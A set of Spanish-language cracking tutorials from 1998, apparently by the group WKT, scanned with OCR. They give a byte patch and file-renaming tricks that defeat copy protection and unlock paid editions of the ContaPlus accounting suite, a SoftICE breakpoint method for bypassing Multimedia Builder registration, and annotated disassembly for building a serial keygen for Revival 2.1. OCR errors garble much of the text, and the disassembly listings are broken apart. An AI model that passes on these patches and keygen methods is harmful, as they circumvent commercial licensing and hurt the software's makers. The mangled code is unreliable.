Pensad el problema antes de mirad la solución, es apasionante. 
Centraos en lo extraño que es que funcione con el ejecutable original 
y no con la copia, cuando son los mismos ficheros. 


EL EXPEDIENTE X DESVIRGADO 


Lo más curioso de todo es que el programa funciona con el ejecutable original, pero no con la copia. 

En principio, esto no tiene sentido, a menos, claro está que exista una diferencia entre el original y el copiado. 
Exactamente, la fecha de creación. 

Para comprobarlo retrasé el reloj del windoze hasta la fecha hora y minuto en el que se había 

construido el ejecutable original. 


En ese preciso momento realizé una copia del origial y BINGO, la copia del ejecutable funcionaba. 

Ya hemos encontrado el flag, pero hace falta saber donde se guarda. 

En el registro del sistema no, porque no realiza ninguna operación extraña. 

Puede guardarlo en algún campo de la base de datos , osea en los fichero dbf. Para eliminar esta opción copie todos los 
ficheros 

(excepto el ejecutable) de nuestro CUENTAPLUS al directorio original, y seguia funcionando. 

En conclusión, el flag está dentro del propio ejecutable. 

¡Para comprobarlo, comparé el ejecutable original y el nuestro y he aquí las diferencias : 


FileSize: 2FA780h 
DD 2F2726h 
DB C7h 
DB 7Fh 
DD 2F2727h 
DB A2h 
DB Clh 
DD 2F272Dh 
DB 9Dh 
DB 3Dh 
DD 2F272Eh 
DB 54h 
[DB 79h 


Cambian 4 posiciones de memoria de un ejecutable a otro. 
Así pues una de las rutinas de acceso a disco que hemos 


desabilitado introduce en el ejecutable final la fecha de creación. 
Para más inri, esta fecha está encriptada y la llave de la desencriptación es BBYYMMAARRCCOOSS. 


Estos programadores nuncan aprenderán a ser humildes, los muy jodidos. 
Si cazamos las dll de disco que hemos anulado 

(copiar y pegar como ya vimos) y desensamblamos, observamos que 

se utiliza una bonita función: 

DosDateTimeToFileTime function converts MS-DOS date and time 
values to a 64-bit file time. 


BOOL DosDateTimeToFileTime ( 


WORD wFatDate, // 16-bit MS-DOS date 
WORD wFatTime, // 16-bit MS-DOS time 
LPFILETIME 1pFileTime // address of buffer for 64-bit file time 


y; 


Ponemos un bpx DosDateTimeToFileTime y lanzamos el contaplus. EUREKA, aparecemos en spptr.dll, un par de £12 más y volvemos a 
al ejecutable original. No os aburriré indicando como localizar la rutina de comprobación del flag (ya somos mayorcitos), doy 
directamente el parche: 


Cambiamos 

:10001545 8D542428 lea edx, dword ptr [esp+28] 

:10001549 51 push ecx ; BBYYMMAARRCCOOSS 
:1000154A 52 push edx 

Por 

:10001545 8D542428 lea edx, dword ptr [esp+28] 

:10001549 51 push ecx ; BBYYMMAARRCCOOSS 
:1000154A 51 push ecx ; BBYYMMAARRCCOOSS 


Buscamos en spptr.dll 8d 54 24 28 51 52 lo encontramos en 0x154A y lo cambiamos por 51 Listo y a disfrutar. 
Ya es hora de volver con la gorda y el peluo para tomar una cerveza. 


JUGUETEANDO 


*Existe una forma alternativa de corregir el problema de aplicación mal instalada. Si cogemos un dbf cualquiera del 
directorio /emp y lo copiamos con el nombre menumode.dbf , entramos en la aplicación pero en versión demostrativa, 
sin copias de seguridad y sin algunas opciones más. 


* Para convertir las copias de seguridad a la versión profesional, cambiad el nombre del fichero /emp/versione.dbf por 
/emp/versionp.dbf y /emp/menuwine.dbf /emp/menuwin.dbf . 

Esto provoca un pequeño error al mirar el "Acerca de'' en el CONTAPLUS, pero no tiene mayor importancia. 
Sospecho que con una poyada de estas más podemos pasar del CONTAPLUS élite al profesional, pero no he dado con 
la tecla. 


* Podemos copiar impunemente el directorio del CUENTAPLUS de un disco duro a otro sin necesidad de reinstalar. 


* Este mismo proceso es aplicable al NOMINAPLUS y FACTURAPLUS y el resto del paquete y muy probablemente 
al resto de productos de la empresa SP. El TVPPLUS está cascado (por lo menos en el cd) por lo que no se ha podido 
probar y el PersonalPlus no necesita retoques. PAra el resto de componenetes del paquete, simplemente se parchea el 
instalar.exe, y se copia el c.a del CONTAPLUS y se comienza la instalación. Una vez instalado, se copia el spptr.dll del 
contaplus en el directorio apropiado para cada producto (NOMINAPLUS: /exe) (FACTURAPLUS: /exe) 


* Para pasar una version demostrativa (o educativa) a versión élite, basta con aplicar el parche al spprt.dll y borrar el 
fichro /emp/menumode.dbf 


PD PARA EL PROGRAMADOR 


Querido Marco: 


Has construido una buena protección. 

He estado tentado de guardarme el crack por respeto. 

Pero lo que me decidió fue la decepción de ver como usabas Clipper y tu forma relajada de 
acceder al disco mediante deviceiocontrol. 

La próxima vez esmérate un poco más, aunque he de reconocer que he disfrutado con tu 
protección en grande. 


Notas para los lectores. 


e ”n 


1.- Los mensajes del tipo ''Hazme el crack para ....”, ''Dime como se crackea....”, ''Dime 
donde puedo encontrar...'' son automáticamente ignorados. El objetivo de estos artículos es 
enseñar a crackear no enseñar a ser unos llorones ineptos que sólo saben mendigar. 


2.- Sólo responderé a preguntas teóricas sobre cracks, indicando algunas pistas que faciliten 
la labor. 


3.- Narices, escribid artículos sobre los programas que crackeeis. 
De nada sirve lo que aprendéis si no lo repartís, se os pudre en el cabeza, palabra. 


4.- Lamento no haber contestado a ciertos mails interesantes. Desde aquí mis excusas. 
5.- Si os ha servido para algo mis artículos, no seáis vagos y mandad un mail indicándomelo. 
Estado+Porcino 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcino O hotmail.com 


Recordad bebed de la fuente, buscad a +ORC en la red. 


COMO CRAKEAR POR ESTADO+PORCINO 


CAPITULO V. COLOR CRACK 


-Como Crackear Multimedia Builder 3.0- 


Noviembre 1998 
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CONCLUSIÓN. 


INTRODUCCIÓN 


Victima: Multimedia Builder 3.0 
Site: www.mediachance.com 
Herramienta: Nuestro amado Sice y Zen crack. 


Hoy es un día de Heineiken,Café de de Kenya,Moskovkaya,Guiness,Mahon y mujeres. 


Bueno, ya estamos de vuelta con un nuevo truco bajo el brazo: "Crack en Color'' que lo aplicaremos a nuestro conejillo de indias, 
el excelente Multimedia Builder. Un programa para crear aplicacniones que incluyen sonido, imagen,video. Se programa al 
estilovisual de VB . No os perdais el reproductor de CD que viene con el ejemplo. 


UN PRIMER VISTAZO 


Realmente este programador se lo ha currado. Ha cerrado la mayoría de las puertas de entrada a los crackers, por tanto hay que 
abrir otras como el "Crack en Color". Veamos alguno de sus ingenios del autor: 


- Existe un número de serie que se introduce desde ''HelplAboutRegister" 


- Cuando introducimos un número de serie falso no aparece ninguna ventana de error. 
Por lo que queda descartado el clásico ''bpx messageboxexa". 


- Las cadenas de caracteres importantes las tiene encriptadas, por lo que no podemos buscarlas con el ''Search and Replace", lo 
que impide un crack en 5 minutos. 


PRIMER OSTIAZO 


Desechados los ataques típicos, vamos a entrar por la puerta clásica siguiendo la pista del Serial falso. 


Metemos un número basura ''12121212", Saltamos al sice y ponemos 's 30:00 1 f££fffff "12121212"" 

¡En cada ocurrecia XX:xx aplicamos 'bpr XX:xx XX:xx+8 rw'. Una vez acabado damos al botón de OK y BOOM, aparecemos en el 
¡sice. Unos F12 llegamos a la rutina "GetwindowTextA". 

Dejamos esta línea de trabajo porque es muy aburrida. 


¡Al final conseguimos aislar una rutina en que devuelve 0 si estamos registrados y 1 en otro caso.Podemos falsearla para 
¡registrarnos. Y de hecho lo ''conseguimos"'. Nuestro nombre aparece en la ventana de registro. Pero hay una sorpresita. Si 
ejecutamos Project/Run aparece "unregistered...''. ¿Cómo es posible? 


¡Pero SI estamos registrados!. La cosa es aún peor, si nos peleamos con el registro y generamos un número de serie válido las cosas 
¡no mejorar. ¿Que está pasando aquí? 
¡ZEN CRACK 


¡Si hemos pasado el algoritmo de registro satisfactoriamente, ¿porqué seguimos sin estar registrados?. 
¡Razonemos, la única forma de no estar registrados es que no pasemos alguna verificación. Sabemos que hemos pasado una, luego 
debe de haber otra verifiación en otra parte del código. 


¡Este programador ha pensado un poco. HA SEPARADO LAS COMPROBACIONES del serial. 
'Y lo que es todavía más interesante, en cada comprobación analiza cosas diferentes. Así, si se pasa completamente una 
¡comprobación no se garantiza que se pase el resto. 


¡Sabemos ya que por lo menos hay dos comprobaciones (una que pasamos y otra no). 

¡Debe existir un nexo de unión entre las comprobaciones: Una variable que guarde el serial que hemos introducido. Pero aquín las 
variantes son múltiples :la primera comprobación puede encriptar el serial para la segunda, modificar un flag para que siempre 
resulte falsa la segunda comprobación... 


¡La pregunta que se plantea es ¿Cómo localizo la segunda comprobación?. 

¡La única pista es el horrible letrero amarillo ".. unregistered ..'. Se podrían analizar todas las variables que modifica el primer 
¡algoritmo , pero eso es demasiado costoso. Debemos buscar otra forma. 

¡La única forma de saber que no hemos pasado las comprobaciones es el letrero amarillo. Es por ahí por donde debemos atacar. 


¡El mensaje está encriptado ,luego desechamos esa vía. 
¡El letrero parece un Label al estilo de de JAVA o Delphi, por lo que no tiene entidad propia como una ventana. 
¡¿Por donde atacamos? 


CRACK EN COLORES 


Centremonos, ¿qué es lo que má llama la atención del letrero? , su color amarillo. 

¡Este color debe de asignarse de alguna forma. Además el amarillo parece que es el color de fondo del letreo. Si desensamblamos a 
¡nuestro objetivo vemos que utiliza la función setbkcolor. 

¡Así pues debemos localizar algo parecido a "setbkcolor(Amarillo)".Pero como se expresa exactamente el color amarillo. 


¡Normalmente los colores se forman a partir de la combinación de los llamados ''colores básicos” . 

¡Lo normal es usar como colores básicos RGB="Rojo Verde y Azul.' Nuestro problema es como expresar el amarillo del letrero en 
función de RGB. Por suerte nuestro amarillo es una simple combinación. Podemos utilizar la paleta de colores de cualquier 
¡programa para comprobarlo. En mi caso he usado el Visual Café 2.5 (crackeado por supuesto). 

¡Introduciendo Rojo=255,Verde=255,Azul=0 obtenemos el mismo amarillo que el del letrero. 


¡Si el color hubiera sido más complejo,capturamos la pantalla con el letrero y la importamos a un editor gráfico como el 
Photoshop.Seleccionamos un pixel del color amarillo del letreo y vemos sus componentes en términos de Rojo, Verde y Azul. 
Es posible que exita un program que realize esta función más sencilla. Si lo encontris, por favor notificádmelo. 


Asi pues debemos de localizar algo asi como "setbkcolor(255 255 0)". Necesitamos conocer si existen más parámetros para el 
¡setbkcolor. Mirando el API tenemos: 


COLORREF SetBkColor (HDC hdc, // handle of device context 
COLORREF crColor // background color value 
y; 

The COLORREF value is a 32-bit value used to specify an RGB color. 


When specifying an explicit RGB color, the COLORREF value has the following hexadecimal form: 
Ox00bbggrr 


Nuestro color es un entero y se pasa como segundo parámetro. Dado que los número se almacenan al revés debemos buscar 
SetBkColor(hdc,0000ffff). Desempolvemos los manuales del Sice, por lo que nos queda 


bpx setbkcolor if (*(esp+8)==ffff0000) 


Expliquemos un poco el churro que ha aparecido. bpx setbkcolor indica que se pare cuando se ejecute la rutina setbkcolor Se para 
cuando (*(esp+8)==00ffff), es decir, cuando el contenido del registro EIP+8 sea O0ffff. Recordemos que los parámteros a las 
funciones se pasan a través de la pila (ESP=registro stack pointer): 


Concretamente es ESP+8 porque en se apilan dos palabra de 4 bytes cada uno. 


Antes de la llamada ESP=000 
Llamada ESP=Dirección de retorno. (palabra de 4 bytes) 
ESP+4=parámetro HDC. (palabra de 4 bytes) 
ESP+8=segundo parámetro 


Aplicando nuestro bpx y pulsando "Proyect/Run'" BOOM, aparecemos en el sice, para ver si estamos realmente ante el setbkcolor 
correcto, cambiemos el color 'd esp+8' Y pasamos de '"'FFFEF00" a "FFFFFF". 
Obtenemos un bonito color blanco de fondo. Luego hemos pillado la llamada correcta. Un par de £12 después obsevamos 


:460a15 cmp [ESI+378],43CA 


Si los valores no son iguales vemos el mensaje de error. Por tanto es este el flag que controla todo. Ya sólo basta ver quien lo 
inicializa. Pero este es un trabajo conocido por todos que lo dejo como ejercicio. 


Fijaos como no se utiliza un clásico flag 1,0 sino un valor difícil 0x43CA. Un nuevo síntoma de que el autor ha leido sobre cracks. 


CONCLUSIÓN 


Hemos aprendido una nueva técnica: '"Color Crack". Es recomendable que se aplique cuando el mensaje de "unregistered ''no sea 
una ventana sino una cadena dentro de una ventana. 
Debemos averiguar el color que se aplica al mensaje y colocar en el Sice: 


bpx nombreRutina if (*(esp+8)==00BBGGRR) 
Recordad que los valores de Blue(azul),Green (Verde) , Red (rojo) están hexa. 


Cuando apararezcamos en el Sice cambiar el color para ver si estamos en la ventana correcta. En tal caso buscar un salto que evite 
el mesaje. 


Este técnica siempre es aplicable, pero se recomienda que se utulize cuando existan pocos colores en la ventana y el mensaje esté 
resaltado del resto (cosa bastante habitual). 


Una posible generalización de está técina es aplicable al color del tipo de letra (foregroundcolor), el tipo de fuente, (setFont), el 
aspecto (cursiva ...). Recordad de echar mano de una buena ayuda Api para win32. 


No olvidemos el esquema de protección tan original de SEPARACIÓN DE COMPROBACIONES que ha implementado el autor. 
Realmente interesante, si señor. 


Notas para los lectores. 


1.- Los mensajes del tipo 'Hazme el crack para ....'', "Dime como de crackea....*', ''Dime donde puedo encontrar...” son 
automáticamente ignorados. El objetivo de estos artículos es enseñar a crackear no enseñar a ser unos llorones ineptos que sólo 
saben mendigar. 


2.- Sólo responderé a preguntas teóricas sobre cracks, indicando algunas pistas que faciliten la labor. 


3.- Narices, escribid artículos sobre los programas que crackeeis. 
De nada sirve lo que aprendéis si no lo repartís, se os pudre en el cabeza, palabra. 


4.- Lamento no haber contestado a ciertos mails interesantes. Desde aquí mis excusas. 
5.- Si os ha servido para algo mis artículos, no seáis vagos y mandad un mail indicándomelo. 
Mr.PinK £ WKT (WHISKEY KON TEKILA ) 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcinoO hotmail.com 
En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 


| [ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 
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INTRODUCCIÓN 


¡Saludos Familia! 


Aprovechando las vacas estivales me he decidido por escribir un bonito Generador de Llaves (en inglés KeyGen) para un útil programa 
de reparación de discos duros y disquetes. Como siempre un poco de Teoría para que podamos entendernos. 


Generadores de Llaves. 


La primera pregunta que responder es ¿qué carajo es un Generador de Llaves? Suponed por un instante que sois unos de esos 
programadores perezosos y cegados por el dinero que ha construido un programa protegido con un número de serie. Si alguien desea 
registrarse debemos pagar una cifra de dinero (pequeña o no) que hará engrosar nuestra cuenta. A cambio debemos de enviarle un 
número de serie que desbloquee el programa. ¿Hasta ahora todo correcto, verdad?. ¿Pero como demonios se genera un número de serie 
diferente para cada usuario? . La respuesta es: con un Generador de Llaves. 


Existen dos tipos de Generadores de Llaves: 


A- Dependientes de los datos del cliente. 
B- Independientes de los datos del cliente. 


El tipo A es el más extendido, el número de serie se genera a partir del nombre del cliente y el de su dirección de correo (por ejemplo). Así 
dos usuarios tendrán números de serie diferentes, por que en principio sus datos personales son diferentes. 


El tipo B está un poco en desuso, pero se siguen viendo por que son fáciles de programar (recordad que los programadores son por 
naturaleza vagos y sin imaginación). 

El mismo número de serie es válido para cualquier cliente. En estos casos, el programador da un número diferente a los clientes pardillos 
que compran su producto y reza para que no se lo den a nadie. 


¿Es posible crear un Generador de Llaves? 


El programa Generador de Llaves está normalmente en el ordenata del programador, entonces, ¿cómo demonios puede un cracker 
construir un Generador ?. La respuesta es sencilla pero difícil (en general) de realizar. 

El programa debe verificar que el número de serie que introducimos es válido y ésto sólo puede hacerlo verificando ciertas propiedades 
que debe cumplir el número de serie y que fueron establecidas por el Generador. 

¿Un poco lioso verdad?, dicho de otra forma, el Generador es un codificador de números de serie y en el programa sólo existe un 
decodificador que descifra el número de serie introducido. 


Vemos un sencillo ejemplo, suponed que nuestro Generador es el siguiente: 
NúmeroSerie=(89934*4)*(nombre(5)) 


Donde nombre(5) es la quinta letra del nombre del usuario. EL número 89934 es el llamado número mágico, un número que es de agrado 
del programador (quizás el número de veces que le ha su jefe le ha jodido) y que realmente es el corazón del Generador 


En el programa, para ver que el número de serie es correcto se debe de verificar: (NúmeroSerie/(4 /nombre(5)) = 89934 


Como podéis apreciar, lo que hay en el programa es la inversa del Generador, por tanto si invertimos la inversa podemos obtener el 
Generador de Partida. 


No os engañéis, este es un Generador sencillo, lo normal es que esté ultra enrevesao , lleno de números mágicos y operaciones aritméticas 
exóticas. 


Normalmente, las rutinas de verificación realizan ciertas comprobaciones sobre la password de entrada. Generalmente pasan a mayúsculas 
y buscan ciertos caracteres en ciertas posiciones. En caso de no encontrarlos la password no es válida. Esto da pie a un truco mu útil pa 
localizar di una forma directa la rutina. Pero esto lo veremos más adelante. 


¿Pos mu bien, pero que necesito pa hacer un Generador de Llaves? 


1.- Lo primero es aislar el código del programa que verifica el número de serie. 
Además del código que las funciones que son llamadas desde la rutina de verificación (pa Saber que narices hacen). Normalmente las 
rutinas de verificación hacen uso de pequeñas rutinas: convertir a mayúsculas,convertir letras en números... 


2.- Un conocimiento exhaustivo, repito, exhaustivo del la rutina de verificación. 

Debemos saber TODO lo que hace y porqué lo hace. Recordad que tenemos que invertir su funcionamineto y esto no lo podemos hacer si 
no sabemos como funciona. Este es el punto más delicado y el que consume más tiempo. Dependiendo de las paranoias del programador 
podéis tardar horas o semanas. Se necesitan conocimientos de ensamblador y de operaciones aritméticas binarias 


3.- Invertir el funcionamineto del Generador y crear con un compilador, por ejemplo de C nuestro propio Generador. 


¿Merece la pena hacer un Generador? 


La respuesta es depende. Hacer un Generador no es nada sencillo, consume mucho tiempo y habilidades. Es mucho más fácil parchear la 
rutina de verificación para que acepte cualquier cosa. 


Pero las ventajas de crear un Generador son muy importantes, primera y ante todo es que realmente se está cumpliendo con la filosofía 
crack (ingeniería inversa) al comprender y transformar el programa para que adapte a nuestras necesidades. 


Segúnda ventaja son los conocimientos que se captan sobre todo a nivel ensamblador y de operaciones aritméricas con bits. 
Tercera y no más importante la satisfacción del trabajo artesano, bien hecho. Esa satisfacción que nos hace seguir adelante. 


La cuarta ventaja tiene que ver con la historia del Software. Puedes ''coleccionar"' las protecciones de tu programa favorito y ver la 
evolución de su software. 


Y como quinta un fin práctico, al final del proceso se obtiene un número de serie válido, lo que te convierte en un usuario "legal'' y 
¡problamente no tengas que crakear la próxima versión. 


Generador de Llaves para REVIVAL 2.1. 
Objetivo: REVIVAL 2.1 


Nombre: revive21.zip 

Tamaño: 874.644 bytes 

Versión: 2.1 

Site: http://uc2.unicall.be/revival/ 

Herramientas: Softlce,W32dasm o IDA 3.75 y un compilador de C. 
Dificultad: No mu difícil. 

Tiempo: 5 horas. 


Este es un interesante programa que te permite recuperar ficheros borrados de discos duros y disquetes que soporta FAT32 y NTEFS. Tiene 
una típica ventana de registro a partir de la cual podemos acceder directamente a la rutina de verificación de la pass. Esta rutina es 
extremadamente sencilla e independiente de los datos del usuario, por eso ha sido la elegida como demostración. 


Aconsejo desensamblar con el IDA PRO 3.75(una pequeña maravilla de desensamblador). Se puede hacer con el W32dasm pero el IDA nos 
da más información y nos ahorra trabajo. Por ejemplo descubre de forma automática rutinas (_touper, isdigit...) que no son reconocidas 
como tales por el W32dasm. 


Bien, manos a la obra, desensamblemos con el IDA. 


¿Ya está? 

Bien, ahora sólo hay que localizar la rutina de verificación. Empleemos un viejo truco: el 80% de las rutinas de verificación intentan 
localizar el carácter '-' (2D en hexa) o el carácter '+' (2B en hexa). 

No me preguntéis por qué, pero lo hacen. Sólo hace falta buscar un 2Dh o un 2Bh y con un poco de suerte aterrizaremos en plena rutina de 
verificación. Debemos buscar una comprobación con 2Dh o bien 2Bh, pero como las comprobaciones pueden ser de muchos tipos , sólo 
buscaremos la parte final de la comprobación. 


Resumiendo, buscaremos ', 2Dh" y ", 2Bh". En caso de existir demasiadas ocurrencias, mejor decantarse por otro método de ataque. Al 
final es el olfato de cracker el que te indica si estás en la ocurrencia correcta o no. 

En este caso hay 20 ocurrencias de ''2D"' y 18 de ''2B". UFF, quizás demasiadas (de hecho es la primera ocurrencia de ''2D" la correcta), 
así que probemos un método más directo con el Softice. 


Metemos como nombre ESTADO, como campañía PORCINO y como número de serie estúpido por ejemplo 1212121212. CTRL+D y le 
damos al botón de OK y aparece una ventana de error. 


Esta ventana se parece a un messageboxexa (por su simplicidad y por el icono en forma de exclamación y por el único botón que aparece). 
Si repetimos el mismo proceso pero poniendo en el softice bpx messsageboxexa y pulsamos el botón de OK ... 

Bingo, aparecemos en la rutina de messageboxexa. Sólo hay que seguir la secuencia de llamadas hacia atrás buscando un salto que evite 
llamar a la ventana de mensaje de error. La secuencia de pasos es: 


* Paramos en bpx messageboxexa 

* Pulsamos F12 para llegar a la rutina padre que llamó a messageboxexa. 

* Aparecemos en :4313CA pero por se ve ningún salto que evite la llamada a messageboxexa. 
* Pulsamos F12 para seguir subiendo hasta la rutina padre. 

* Aparecemos en :43145D. Pero de nuevo nada interesante. 

* De nuevo Fl2 y .... 

* Aparecemos en :40CAAGCS, esta si tiene lo que buscamos, exactamente. 


0040AA6C Call sub_40CD10 ; RUTINA DE VERIFICACIÓN 
0040AA71 add esp, 4 

0040AA74 test eax, eax 

0040AA76 jz short loc_40AABA; SALTA SI ERES UN MAL CRACKER. 
0040AA78 mov dword ptr [esi+5Ch], 1 

0040AA7F mov eax, [esi+64h] 

0040AA82 push eax 

0040AA83 push offset aName; NOMBRE. 

0040AA88 Call sub_40AD70 

0040AA8D add esp, 8 

0040AA90 mov eax, [esi+60h] 

0040AA93 push eax 

0040AA94 push offset aCompany; COMPAÑÍA. 

0040AA99 Call sub_40AD70 

0040AA9E add esp, 8 


0040AAA1 mov eax, [edi] 


0040AAA3 push eax 


0040AAA4 push offset aSerial;NÚMERO DE SERIE. 

0040AAA9 Call sub_40AD70 

0040AAAE add esp, 8 

0040AAB1 mov ecx, esi 

0040AAB3 call sub_42550E 

0040AAB8 jmp sh 

0040AABA ; ÁRA anun a 

0040AABA 

0040AABA loc_40AABA: ; CODE XREF: sub_40AA20+56_3 
0040AABA push OFFFFFFFFh 

0040AABC push 30h 

0040AABE push OEF1Fh ; DIRECCION DEL MENSAJE DE ERROR 
0040AAC3 Call sub_431413 ¡ VENTANA DE MESAJE DE ERROR 
0040AAC8 mov ecx, esi 

0040AACA Call sub_425527 

0040AACF 

0040AACF loc_40AACF': ; CODE XREF: sub_40AA20+98_3 
0040AACF push OFFFFFFFFh 

0040AAD1 mov ecx, edi 

0040AAD3 call sub_429A33 

0040AAD8 pop edi 

0040AAD9 pop esi 

0040AADA retn 

0040AADB ; ARAAARAARAMARAMARAARA RRA RARA RARA RA RARARARAMARARARARAMARARARARARARARARA AA RAR 
0040AADB 

0040AADB loc_40AADB: ; CODE XREF: sub_40AA20+25_3 
0040AADB ; sub_40AA20+40_3 

0040AADB push OFFFFFFFFh 

0040AADD push 30h 

0040AADF push OEF1Eh 

0040AAE4 Call sub_431413 

0040AAE9 pop edi 

0040AAEA pop esi 

0040AAEB retn 

0040AAEB sub_40AA20 endp 


Fijaos en el salto en :40AA76. Si saltamos caemos en la ventana de mensaje y evitamos acceder a NOMBRE,COMPAÑÍA y NÚMERO DE 
SERIE. El salto está controlado por :40AA6C call sub_40CD10 .Que interesante, una rutina que controla la ventana de mensaje de error, 
¿a qué nos suena ésto?. BINGO, estamos ante la rutina de verificación. 

Échemósle un vistazo y comentémosla. 


¡Desensamblado con el IDA ;p(0) indica el carácter 0 de la password. Recordad, empiezo a contar los caracteres desde 0. 


0040CD10 sub_40CD10 proc near ; CODE XREF: sub_404600+98_p 

0040CD10 ; sub_40AA20+4C_p 

0040CD10 

0040CD10 var_24 = byte ptr -24h ; 1 variable local. 

0040CD10 var_20 = word ptr -20h ; 2 variable local. 

0040CD10 var_1E = byte ptr -1Eh ; 3 variable local. 

0040CD10 var_1B = byte ptr -1Bh ; 4 variable local. 

0040CD10 arg_0 = dword ptr 4 ; Argumento de la función que no es más que la dirección 
de nuestra password. 

0040CD10 

0040CD10 sub esp, 24h; Ajusta la pila para reservar espacio para las varibles 
locales. 

0040CD13 push ebx; Guarda algunos registros. 

0040CD14 push esi 

0040CD15 mov esi, [esp+2Ch+arg_0] ; esi= dirección de nuestra password. 
0040CD19 push edi 

0040CD1A movsx eax, byte ptr [esi] ; eax=p(0) 

0040CD1D push eax 

0040CD1E Call _toupper ; Pasamos a mayúsculas p(0). 

0040CD23 add esp, 4 


0040CD26 cmp eax, 52h ; ¿ES P(0) = R? 


0040CD29 
0040CD2F 
0040CD33 
0040CD34 
0040CD39 
0040CD3C 
0040CD3F 
0040CD45 
0040CD49 
0040CD4F 
0040CD50 
0040CD56 
0040CD59 
15 

0040CD5F 
0040CD64 
0040CD64 


0040CD64 
0040CD68 
0040CD69 
0040CD6E 
0040CD71 
0040CD73 
número. 

0040CD79 
0040CD7A 
0040CD7D 
0040CD7F 


0040CD84 
0040CD84 
0040CD84 
0040CD88 
0040CD89 
0040CD8E 
0040CD91 
0040CD93 
0040CD99 
0040CD9A 
0040CD9D 
0040CD9F 
0040CDA3 
0040CDA8 
0040CDAC 
0040CDB1 
0040CDB2 
0040CDB7 
0040CDBB 
0040CDBE 
0040CDC3 
0040CDC5 
0040CDC9 
0040CDCD 
0040CDD2 
0040CDD3 
0040CDD8 
0040CDDC 
0040CDDF 
0040CDE2 
0040CDE5 
0040CDE6 
0040CDE8 
0040CDEA 
0040CDED 
0040CDFO 


loc_40CD64: 


loc_40CD84: 


jnz loc_40CE7F ; Salta a flag de error si p(0) no es R. 
movsx eax, byte ptr [esi+1] ; eax=p (1) 
push eax 
Call _toupper ; Pasamos a mayúsculas p(1). 
add esp, 4 
cmp eax, 56h ; ¿ES P(1) = Vv? 
jnz loc_40CE7F ; Salta a flag de error si p(1) no es V. 
cmp byte ptr [esi+7], 2Dh ; ¿ES P(7) = '-'? 
jnz loc_40CE7F ; Salta a flag de error si p(7) no es '-'. 
push esi 
Call ds:1istrlenA ; Calcula el tamaño de la password. 
cmp eax, OFh ; ¿Es el tamaño 15? 
jnz loc_40CE7F ; Salta a flag de error si el tamaño no es 
mov edi, 2 ; Segundo carácter. 
; CODE XREF: sub_40CD10+6D_3 
¡Bucle para comprobar que son números p(2)...p(6) 
movsx eax, byte ptr [edi+esil]; eax=p (2) 
push eax 
Call _isdigit ; ¿es un número p(2)? 
add esp, 4 
test eax, eax 
Jz loc_40CE64 ; Salta con flag de error si p(2) no es 
inc edi ; Apuntamos al siguiente carácter. 
cmp edi, 7 ; ¿Hemos llegado a p(7)? 
31 short loc_40CD64 ; Salta si no hemos llegado a p(7). 
mov edi, 8 ; Octavo carácter. 
¡Bucle para comprobar que son números p(8)...p(14) 
; CODE XREF: sub_40CD10+8D_3 
movsx eax, byte ptr [edi+esi];; eax=p (8) 
push eax 
Call —_isdigit ¡;¿es un número p(8)? 
add esp, 4 
test eax, eax 
Jz loc_40CE6D ; Salta con flag de error si p(8) no es número. 
inc edi ; Apuntamos al siguiente carácter. 
cmp edi, OFh ; ¿Hemos llegado a p(15)? 
31 short loc_40CD84; Salta si no hemos llegado a p(15). 
mov ax, [esi+2] ; ax=p(2)p(3) 
mov [esp+30h+var_20], ax 
lea eax, [esp+30h+var_20] 
mov [esp+30h+var_1E], O 
push eax 
Call _atoi ¡Pasa p(2)p(3) a número. 
mov cx, [esi+5] ¿cx=p (5)p(6) 
add esp, 4 
mov [esp+30h+var_20], cx 
sub al, 13h ; al=p(2)p(3)-19 
lea ecx, [esp+30h+var_20] 
mov [esp+30h+var_24], al 
mov [esp+30h+var_1E], O 
push ecx 
call _atoi ¡Pasa p(5)p(6) a número. 
lea edx, [esp+34h+var_20]; 
add esp, 4 
lea ebx, [eax-25h] ¿ebx=p (5)p (6) -37 
lea ecx, [esi+0Ah] ¡ecx=dirección de p(10) 
push edx 
mov eax, [ecx] ¿ebx=p (10)p (11)p (12)p (13) 
mov [edx], eax 
mov cl, [ecx+4] ¿;cl=p (14) 
mov [edx+4], cl 
mov [esp+34h+var_1B], O 


0040CDF5 Call 
0040CDFA add 
0040CDFD mov 
0040CDFF xor 
0040CE04 mov 
0040CE08 mov 
0040CE0D lea 
0040CE11 mov 
0040CE16 movzx 
0040CE19 push 
0040CE1A Call 
0040CE1F mov 
0040CE23 add 
0040CE26 xor 
0040CE28 mov 
0040CE2D mov 
0040CE2F mov 
0040CE34 lea 
XOR 21508) + 3 

0040CE38 cda 
0040CE39 idiv 
0040CE3B mov 
0040CE3D xor 
0040CE3F mov 
0040CE43 lea 
21508) + 3 

0040CE47 cdg 
0040CE48 idiv 
0040CE4A sub 
0040CE4D cmp 
0040CE50 jnz 
0040CE52 cmp 
0040CE56 jnz 
p(4) 

0040CE58 mov 
0040CE5D pop 
0040CE5E pop 
0040CE5F pop 
0040CE60 add 
0040CE63 

0040CE64 ; 

0040CE64 

0040CE64 loc_40CE64: 

0040CE64 

0040CE66 

0040CE67 

0040CE68 

0040CE69 

0040CE6C 

0040CE6D ; 

0040CE6D 

0040CE6D loc_40CE6D: 

0040CE6D xor 
0040CE6F pop 
0040CE70 pop 
0040CE71 pop 
0040CE72 add 
0040CE75 

0040CE76 ; 


_atoi ¡Pasa p(10)p(11)p(12)p(13)p (14) a número. 
esp, 4 

edi, eax 

di, 5468h ¿di=p(10)p(11)p(12)p(13)p (14) XOR 21508 
ax, [esi+8] ¡ax=p (8)p(9) 


[esp+30h+var_20], ax 

eax, [esp+30h+var_20] 

[esp+30h+var_1E], O 

edi, di 

eax 

_atoi ¡Pasa p(8)p(9) a número. 
byte ptr [esp+34h+var_20], al 

esp, 4 

eax, eax 

ecx, 64h 

al, bl ¡al=p (5)p(6)-37 

ebx, 0Ah 

eax, [eaxtedi+3]; eax'=(p(5)p(6)-37)+(p(10)p (11)p (12)p (13)p (14) 


ecx ¡Divide eax'/100 

cl, dl ¡¿Ccl=resto (eax'/100) 

eax, eax 

al, [esp+30h+var_24] 

eax, [eaxtedi+3]; eax=(p(2)p(3)-19)+(p(10)p (11)p(12)p(13)p (14) XOR 


ebx ¡Divide eax/10 
dl, [esi+4] ¿dl=resto (eax/10)-p (4) 
